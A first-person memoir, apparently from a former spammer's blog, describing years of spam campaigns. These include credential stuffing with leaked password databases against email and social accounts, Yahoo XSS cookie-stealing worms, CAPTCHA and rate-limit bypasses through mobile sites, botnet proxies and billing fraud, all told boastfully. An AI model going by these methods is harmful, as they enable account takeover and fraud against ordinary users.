Spam Operation: Twitter & Pinterest

Social network spam was the root of my spamming career, it started with MySpace and as other social networks became popular, they became targets. With a plethora of data at my disposal, it wasn’t difficult to turn the data into dollars. The same concept of my infamous “contact mail” was used on these social networks. Create software that would check to see if the same email/password credentials were used on these sites and spam their friends, wall, board, etc. Now the success rate of these logins were much lower than e-mail, some even as low as 2 to 4%, but when you have 100s of millions of records, the percentage is merely a statistic. Without any login rates or security on these sites, I could easily check a few million accounts in just a few hours. Of course I had 20,000+ proxies at all times to use, but it was only a precaution I used to keep them guessing.

This would eventually lead to 10s of millions accounts being spammed on throughout 2013-2014. I was promoting whatever Dr. Oz was endorsing that month, everything from garcinia cambogia, green coffee beans, and raspberry ketones. Anytime I wanted to make a few thousand dollars I could just run 100k accounts in the matter of minutes.

Here’s a few articles guessing what was going on with these social networks

Hacking Yahoo with XSS

The first time I remember reading about XSS was when the Samy worm was created on MySpace in 2005. In fact, I had actually used different XSS techniques to bypass MySpace’s filters during my operation.

Anyways, the first time I saw a Yahoo XSS was on another spammer’s landing page that was promoting a work from home program. My friend owned the program he was pushing and wanted me to check out his landing page and see how he was making $5,000/day. After investigating it for a few minutes, I saw that there was a bit of code loading from the domain yahoo.com. This was unusual, because there wasn’t any reason why any assets from yahoo.com should be loading. I captured the headers and saw that it linked back to hk.groups.yahoo.com or something similar. There was a forum on the page that was vulnerable to a persistent XSS attack. He was stealing yahoo user’s cookie sessions and mailing with them.

sorted-XSS

After understanding the intricacies of this operation I wasn’t too surprised that he was clearing $5,000/day. Within the hour, I found the injection point and had injected my own code into the vulnerable Yahoo forum. Now when you steal a user’s session cookie it means that you don’t need their login credentials, no email, no password, nothing. You were already logged into their account by having their cookie. The worm was fairly simple, you grab the users cookie, hit mail.yahoo.com, and send mail to everyone in their address book. Once users read the email and visited the website that was sent in the email,  it would grab their cookie and go through the process all over again. Yahoo killed the website that was vulnerable in just a couple of days, but not before making close to $30,000.

For me, hacking and spamming is a high that can’t be replicated. Over the next year, I would go on to find more XSS exploits, once again playing cat and mouse with Yahoo’s security team. The most infamous XSS exploit that I found was on the Yahoo developer’s blog. It was a publicly known exploit, but for me it was a chance to slap Yahoo in the face. Now I didn’t necessarily have a grudge against Yahoo, but at the time they were offering security researchers $12.50 voucher to their store for these same exploits that put every user on Yahoo at risk.

On this particular XSS vulnerability and worm, I hacked over 5 million accounts and sent over 25 million emails in a 3 day period. At the peak of this worm I was making $1,000 every 10 minutes. I was promoting a work from home program that paid $100 per sign up and I accumulated over 2,500 sales, do the math on that one. This caused havoc for yahoo and eventually led them to change the way they stored cookies.

Here’s a couple of articles detailing the exploits:

The Battles Fought with Microsoft and Yahoo

A lot of people will assume that everything I did was because of the money. The truth is hacking and spamming was my greatest passion in life. The money was just a bonus and a measurement of my success. The battles I fought with Yahoo and Microsoft’s security team was some of the most fun and greatest moments of my life. Now, I might have given the impression that you can just create automated software, load some data, type a command, and become a successful spammer. It may have been like that in the very beginning, but if you thought Microsoft and Yahoo was going to just sit around and continue to allow me to have my way, you’re wrong.

The entire contact mail operation was a cat and mouse game. Microsoft and Yahoo would implement a security feature and I would figure out a way to beat it. For years, I was using the basic webmail protocol to login and fetch the users address book, to mail I would use good old port 25 better known as SMTP. The first security feature they implemented was CAPTCHA. CAPTCHA could be solved with an OCR or optical character recognition software. There were brilliant programmers out there that created and rented software that could actually read the distorted characters with a 60%+ success rate.  There were also services out there to solve CAPTCHAs for you at a rate of $2 per 1,000 CAPTCHAs. I didn’t like either of these options.

hotmailcaptchaReverse engineering is probably one of my greatest strengths. It can be traced all the way back to my first operation on MySpace in 2007. I simply ask myself questions like; “How does this work?”, “How can I make this computer believe that I’m a human user?”. In this case, the question was how can I trick Hotmail into not showing me that CAPTCHA. The answer was literally in my hand, it was my phone. The developers overlooked implementing CAPTCHA on their mobile website. It was as simple as changing hotmail.com to m.hotmail.com. This would allow me to completely bypass CAPTCHA.

hotmail

It wasn’t long before Microsoft caught on and realized the mistake they made. Within a few months they implemented CAPTCHA on their mobile website and even started locking the accounts. Now here’s the thing, I only needed to login to the hotmail website to pull the list of contacts in the address book. With Microsoft getting smarter, it was time to look at other options. I don’t remember exactly what sparked the idea, but there were a handful of websites that would allow you to import your address book and invite your friends to the website. These special websites were whitelisted and wouldn’t require a CAPTCHA. In fact, it would use the website’s IP address to login to your account. There were several websites like this, but the one I remember most is MySpace.

After months of battling with Microsoft and Yahoo, they finally implemented SMS verification. SMS verification was implemented by locking you out of your account until you added a cell phone number. If there was a suspicious attempt to login to your account, they would send a code to your phone and you would have to enter it to log in to your account. This would prevent guys like me from logging into your account unauthorized, or so they thought.

catandmouse

Like I said, it was a game of cat and mouse. Mobile applications were on the rise and these email providers didn’t miss the opportunity to join the game. Hotmail and Yahoo alike created their own email applications for Android and iPhone. This was new territory for the both of us. The thing about technology is it’s always ahead of security.

When I downloaded the apps, I found that you could login to any account without any kind of security. These mobile applications used entirely different servers and had zero security implemented. In other words, they were wide open. I mean there wasn’t even the standard rate limit request for an IP address. This was a game changer and allowed me to continue my operation for quite some time. While it didn’t only prolong my contact mail operation, it opened my eyes about reverse engineering other applications in the future.

The Evolution of Contact Mail

While the Twitter operation was a success, I still wanted to go back to the more quiet side of my contact mailing. The only problem was that the accounts I was mailing with were producing less and less results. If I wanted to produce the numbers I was used to seeing, I would have to expand my operation into other email providers.

So in 2012, I did a domain extension count on my databases. This would tell me how many accounts I had for each email provider and more importantly tell me the most popular providers. The top three were obviously Hotmail, Yahoo, and Gmail. At the time, I was nearly 2 years into my Hotmail and Yahoo operation. Now I didn’t want to go up against Google, as I knew their security precautions with reCAPTCHA would be a huge headache. I was more interested in the lesser known providers. This left me with four options; AOL, Road Runner, Cox, and Earthlink. There were a couple things about these options that I loved. First, they were all US based, this meant that all of the traffic generated from these accounts and more importantly their contacts would be from the US. Secondly, nobody had ever thought about contact mailing these providers. It was as fresh as the very first contact mail operation on Hotmail.

So which one did I choose to do? All of them.

Twitter v1.0

In the spam game staying current with the trends is just as important as any other marketing job. I’ve always had an eye for trends and being able to predict the next big social media website. By 2011 Twitter had grown to over 250 million members and had no plan of slowing down. This made Twitter a prime candidate for my next spam operation. Back then there was no security, I don’t even think they had a security team to be honest.

The operation would be fairly simple and would have the same concept as most of my operations. Take the email and password combinations from the databases I owned and check to see if they used the same password. I was amazed at not only how many worked, but how many people actually had a twitter account. The thing is, if you had a twitter account you probably used the same password you signed up to any other site with. The raw number was about 10% (that’s not excluding if the email address was even registered on twitter). At the time that was somewhere in the neighborhood of 3 million valid twitter accounts.

The second function of the software would DM the account’s followers and send out a tweet. The first campaign I ran was a bizop offer. Bizop was my goto because it appealed to everyone and yielded the highest return. I mean who doesn’t want to make money from home?

While the campaign was a success with netting thousands of dollars a day, the risk didn’t seem worth it. What I mean is there were hundreds of websites asking “Did Twitter get hacked?” And “Help! My twitter account has been hacked”. Not only that, journalists and bloggers alike were writing about the havoc I was causing on Twitter.

twitter2011

For now, the operation was on the back burner and I would revert back to the more quiet operations.

The Expansion of Contact Mail

In a previous post, I described how hotmail and their users were the first to experience the effects of contact mail. When accounts on hotmail started producing less and less money, it was time to explore other email providers. In 2011, Yahoo would be the next email provider to experience contact mail. Now Yahoo was different, they actually had some security measures which would prevent me from abusing them the same way I was able to on Hotmail.

One of the most notable security features they had implemented was IP address rate limiting. This meant I wasn’t able to mass verify login credentials from my databases without being banned from Yahoo. It was a problem, but a fairly easy one to solve. All I needed was a massive pool of IP addresses. Luckily for me, because of some of the communities I was in, I knew where to purchase this type of service. For $400 a week, I could rent 10,000 online botnet proxies. This would be more than enough to bypass any rate limiting Yahoo had implemented.

And just like that I had restored my contact mail operation back to it’s full glory.

Singlesnet.com – Hacked.

There wasn’t ever any reports made by media or even a response from Singlesnet. Now I’m not sure exactly when it was hacked, but I came into possession of this database from a trade I did with a friend. The date on the file was 2011 so I’m assuming it was hacked not long after eHarmony. In fact, this database was just as glorious as eHarmony. It contained 16 million records of emails and plaintext passwords. I treated this database the same way I did eHarmony. The contact mail operation was back in full force. I actually found the farticle (fake news article) I used to promote the work from home programs.

cnbc7

The Birth of Contact Mail

After receiving the eHarmony database, I had to do some serious brainstorming on how I could maximize the profits with this data. I knew that the people who already had the database would be sending all kinds of dating offers to the e-mail addresses. I also knew that I would be able to mail to the same list, but I didn’t want to compete with the other guys. I had to think outside of the box, so I thought back to my very first MySpace operation nearly three years ago and came up with the brilliant idea to e-mail the contacts in the address book. Little did I know how much this method would change the spam game forever.

The software created would attempt to login to hotmail.com and check whether the user used the same password as they did on eHarmony. You have to remember this was back in 2010 and people weren’t as educated about security as they are today.  So after running the accounts through the software about 25% of the people used the same password. When it was finally done I had around 1 million valid hotmail accounts that I could mail with.

I had just moved from Florida to downtown Los Angeles with a girl I met online, paying $3,800/mo for a condo that I probably couldn’t afford. In fact, at the time, I only had a couple hundred dollars to my name. Hurting for cash and Christmas being right around the corner, this operation had to work.

condo2

With little to no start-up cash, I had to bootstrap and think outside of the box once again. I remembered back to my first mailing operation where I used a service that rented cloud servers that allowed you to pay as you go. It was easy to trick the payment processing by using a prepaid gift card, as they would only check your card for $1 and bill you at the end of the billing cycle. It cost me $20 for a prepaid tracfone which was used to verify my account on the cloud service. It was their security precaution for my previous endeavors with their service.

I created 15 servers which meant that I was able to place my mailing software on each one. This meant that I had the power of 15 mailers. At approximately 100 mails per second across 15 servers, I was sending nearly 100,000 e-mails a minute. I didn’t realize exactly how fast this was, but I was soon going to find out. At the time I was promoting a bizop offer which is basically a make money from home program. It was a program that would pay me around $40 per sign up. At the peak hours of the day I was making something like $10,000 an hour. The adrenaline rush, excitement, and anxiety that this caused was unmatched to any drug I had ever tried. Over the weekend, I had accumulated something like 8,000 sign ups. That’s right, over 15,000,000 e-mails sent and $300,000 in revenue generated from a free database, a $20 tracfone, and a $10 gift card.

SOk9x

This was the first time that the internet was introduced to “contact mail”. It was also the first time that the advertiser (the person who owned the program) experienced this type of traffic. The advertiser was irate once he found out how the sales were generated and called it all fraud. While in a sense, I did agree it was deceptive, but what couldn’t be disputed was the fact that there was a ton of money generated and sitting in his bank accounts. We ended up settling on an agreement of $100,000 and parted ways. I was 21 years and this was definitely the most money I had ever seen. It was a moment in my life where I knew had discovered something great and would be set financially for a very long time.

My First E-mail Spam Operation

I knew a guy that did white hat mailing for a living, so I decided to consult him. Now he was from the AOL scene too and you could say that there was a certain level of camaraderie between people from that scene. We came to an agreement that he would provide e-mail data for a revenue share.

I decided to use the hotmail accounts from the Hi5.com database to mail from, after all 25% or more of the people used the same passwords for everything. I partnered with a programmer to create software that would verify which accounts used the same password on hotmail and additional software that would mail with those accounts.

I did it, I was in business, I was officially an e-mail spammer. I remember it like it was Christmas, because it actually was a day before Christmas 2009. I made something to the tune of $17,000 the first month of e-mail spamming, or so I thought. My programmer and partner at the time actually took the majority of the money and took off to the Dominican Republic for an extended vacation.

Things in my life got pretty rough after that, mostly because of drug abuse. I ended up moving to Kissimmee, Florida. It was a chance to get a fresh start with 2 other guys from the AOL scene that started an affiliate marketing company. It was a win-win situation for all of us, I could focus on mastering my craft, and I would in return help the company grow by promoting their offers.

Upon arrival, I couldn’t help but to feel like Will Smith in the Fresh Prince of Bel-Air. I grew up in a small town, in a small house outside of Little Rock. This house was 4,400 square feet and came equipped with a movie theater, pool, and jacuzzi. Although it wasn’t necessarily a mansion, we still deemed it the “Spamansion”.

spamansion

spamansion2

spamansion3

Everyday for 5 months, we got up at 5 A.M. to launch our campaigns, cook breakfast, and sparked a blunt to get the day started. I was promoting everything from dating websites to credit report offers, making anywhere from $300 to $1000 a day. It was the beginning of me realizing my potential and what I could actually achieve if I worked hard and stayed focused. We celebrated daily and frequently invited other internet marketers to come visit and party with us. I was 20 years old at the time and I’ll always remember this as being one of the greatest summers of my life.

Meetup.com and the Year of the Flog

At the end of 2008 and the beginning of 2009, I started exploring more into affiliate marketing. I discovered that there were far more offers to promote that would yield a higher return. Weight loss was a hot niche and people were making a ton of money by selling nutraceutical products. I wanted in.

Now, affiliate marketing is a copy cat industry. Everyone copies each other in one capacity or another, but most commonly copied is landing pages. I don’t remember where I copied mine, but I did find the very first landing page I used back in 2008-2009 thanks to WayBackMachine. It was titled “Maria’s Weight Loss Blog“.

Screen Shot 2017-12-04 at 8.25.32 PM

Spamming on MeetUp was my first endeavor on promoting weight loss products. I was new to the niche, but I was excited to take on the new challenge. Meetup.com was a fast growing social website that allowed people to create groups and meet each other with the same interest/hobbies. This was a great potential target for me, because I could infiltrate these groups as a new member without being introduced by an existing member. There was also an e-mail address assigned to each group that would distribute an e-mail to everyone in the group. So if there were 5,000 members in a group, all I would have to do is send 1 e-mail. It was essentially the key to the castle.

In my previous spamming operation on MyYearBook, I learned the process of scraping data. That technique would play a huge part in the success of this campaign. I needed to scrape every group and even join the group with an account to grab the otherwise hidden e-mail address. To achieve this I needed multiple accounts even more frustratingly, I had to activate the accounts by clicking a link in the e-mail. I used a trick that’s still around today. I used one throwaway gmail account and used a variation of it by putting periods randomly in the email address. This would allow me to use the same account and automate activating the accounts using IMAP.

When it was said and done I had successfully captured the e-mail assigned to 70,000+ groups on MeetUp. I guess this would be considered my first e-mail campaign even though it wasn’t the traditional e-mail campaign. Everyone got an e-mail about Maria’s weight loss success and a huge percent bought the products “she” used.

The next day MeetUp addressed and released a blog post detailing how to disable the e-mail for the group feature. It’s since been taken down, but it was very fascinating to have a response to my operation.